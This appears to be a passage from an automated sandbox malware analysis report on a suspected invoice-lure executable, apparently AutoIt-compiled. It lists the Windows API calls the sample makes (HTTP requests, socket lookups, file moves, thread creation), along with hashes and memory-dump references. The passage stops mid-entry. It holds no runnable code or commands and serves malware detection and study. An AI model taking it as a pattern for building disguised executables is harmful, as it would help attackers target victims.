                                                          • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                                                          • Opcode Fuzzy Hash: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                                                          • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                                                          APIs
                                                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                                          • DestroyWindow.USER32(?), ref: 00426F50
                                                          • UnregisterHotKey.USER32(?), ref: 00426F77
                                                          • FreeLibrary.KERNEL32(?), ref: 0042701F
                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                          • String ID: close all
                                                          • API String ID: 4174999648-3243417748
                                                          • Opcode ID: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                                          • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                                          • Opcode Fuzzy Hash: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                                          • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                                          APIs
                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                                          • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                                            • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                          • String ID:
                                                          • API String ID: 1291720006-3916222277
                                                          • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                          • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                                                          • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                          • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                                                          APIs
                                                          • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                                          • IsMenu.USER32(?), ref: 0045FC5F
                                                          • CreatePopupMenu.USER32 ref: 0045FC97
                                                          • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                          • String ID: 0$2
                                                          • API String ID: 93392585-3793063076
                                                          • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                          • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                                          • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                          • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                                          APIs
                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                                          • VariantClear.OLEAUT32(?), ref: 00435320
                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                                          • VariantClear.OLEAUT32(?), ref: 004353B3
                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                                          • String ID: crts
                                                          • API String ID: 586820018-3724388283
                                                          • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                          • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                                          • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                          • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                                          APIs
                                                            • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exe,0040F545,C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exe,004A90E8,C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exe,?,0040F545), ref: 0041013C
                                                          • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                                          • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                                          • _wcscat.LIBCMT ref: 0044BCAF
                                                          • _wcslen.LIBCMT ref: 0044BCBB
                                                          • _wcslen.LIBCMT ref: 0044BCD1
                                                          • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                          • String ID: \*.*
                                                          • API String ID: 2326526234-1173974218
                                                          • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                          • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                                                          • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                          • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                                                          APIs
                                                            • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                                          • _wcslen.LIBCMT ref: 004335F2
                                                          • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                                          • GetLastError.KERNEL32 ref: 0043362B
                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                                          • _wcsrchr.LIBCMT ref: 00433666
                                                            • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                          • String ID: \
                                                          • API String ID: 321622961-2967466578
                                                          • Opcode ID: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                                          • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                                          • Opcode Fuzzy Hash: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                                          • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: __wcsnicmp
                                                          • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                          • API String ID: 1038674560-2734436370
                                                          • Opcode ID: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                                          • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                                          • Opcode Fuzzy Hash: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                                          • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                                          • __lock.LIBCMT ref: 00417981
                                                            • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                                            • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                                            • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                          • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                                          • __lock.LIBCMT ref: 004179A2
                                                          • ___addlocaleref.LIBCMT ref: 004179C0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                          • String ID: KERNEL32.DLL$pI
                                                          • API String ID: 637971194-197072765
                                                          • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                          • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                                          • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                          • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: _memmove$_malloc
                                                          • String ID:
                                                          • API String ID: 1938898002-0
                                                          • Opcode ID: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                                          • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                                          • Opcode Fuzzy Hash: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                                          • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                                          APIs
                                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                          • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                                          • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                                          • _memmove.LIBCMT ref: 0044B555
                                                          • _memmove.LIBCMT ref: 0044B578
                                                          • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                                          • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                                          • String ID:
                                                          • API String ID: 2737351978-0
                                                          • Opcode ID: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                                          • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                                          • Opcode Fuzzy Hash: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                                          • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                                          APIs
                                                          • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                                          • __calloc_crt.LIBCMT ref: 00415246
                                                          • __getptd.LIBCMT ref: 00415253
                                                          • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                                          • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                                          • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                                          • _free.LIBCMT ref: 0041529E
                                                          • __dosmaperr.LIBCMT ref: 004152A9
                                                            • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                          • String ID:
                                                          • API String ID: 3638380555-0
                                                          • Opcode ID: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                          • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                                                          • Opcode Fuzzy Hash: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                          • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 0046C96E
                                                            • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                            • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Variant$Copy$ClearErrorInitLast
                                                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                          • API String ID: 3207048006-625585964
                                                          • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                          • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                                          • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                          • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                                          APIs
                                                          • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                                            • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                          • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                                          • gethostbyname.WSOCK32(?), ref: 004655A6
                                                          • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                                          • _memmove.LIBCMT ref: 004656CA
                                                          • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                                          • WSACleanup.WSOCK32 ref: 00465762
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                                          • String ID:
                                                          • API String ID: 2945290962-0
                                                          • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                          • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                                          • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                          • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                                          APIs
                                                          • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                                          • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                                          • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                                          • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                                          • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                                          • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                                          Memory Dump Source
